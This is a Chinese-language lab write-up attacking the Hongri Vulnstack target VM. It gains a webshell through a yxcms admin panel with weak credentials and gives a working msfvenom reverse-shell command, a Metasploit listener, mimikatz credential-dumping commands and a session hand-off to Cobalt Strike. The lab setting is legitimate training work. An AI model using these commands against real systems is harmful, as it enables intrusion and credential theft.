一、前言
这个是红日的一个靶机,http://vulnstack.qiyuanxuetang.net/vuln/detail/2/
在信息搜集过程中发现MySQl文件下面还有个yxcms文件夹,这里通过这个yxcms get shell
二、Get Shell
访问http://192.168.157.138/yxcms/index.php 有一个登录界面,输入admin并不是后台,将member参数改为admin进入了后台登陆界面
弱口令admin/123456进入后台
在前台模板里我们可以新建一个模板,但是路径不好找到。如果对http://192.168.157.138/yxcms/目录进行遍历
会发现新建的模板在http://192.168.157.138/yxcms/protected/apps/default/view/default/ 下面
基于路径问题可以直接对index_index.php进行修改,添加一句话,用蚁剑连接。
到这里如果用CS连接,后面就与上一篇一样了。为了说明一下msf给cs派生session,先用msf getshell。
msf生成木马:
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.157.137 lport=1234 -f exe > shell.exe
msf开启监听:
use exploit/multi/handler set lhost 192.168.157.137 set lport 1234 set payload windows/meterpreter/reverse_tcp exploit
将生成的木马上传并运行,可以看到连接上了
meterpreter信息搜集:
get uid getsystem ps 查看有哪些进程 migrate PID 将进程迁移至正常服务内 load minikatz mimikatz_command -f sekurlsa::searchPasswords minikatz_command -f sekurlsa::logonPasswords
派生sessoin
cs创建监听:
cs上面创建listener reverse_http 配置端口54321。注意cs和msf通讯端口和类型要一样
msf:
background sessions use exploit/windows/local/payload_inject set payload windows/meterpreter/reverse_http set DisablePayloadHandler true set lhost 192.168.157.137 set lport 54321 set session 1 exploit
可以看到cs上线了一台机器,至此msf派生了session至cs。
剩余的与上一篇就一样了,里面还有很多点没有利用到。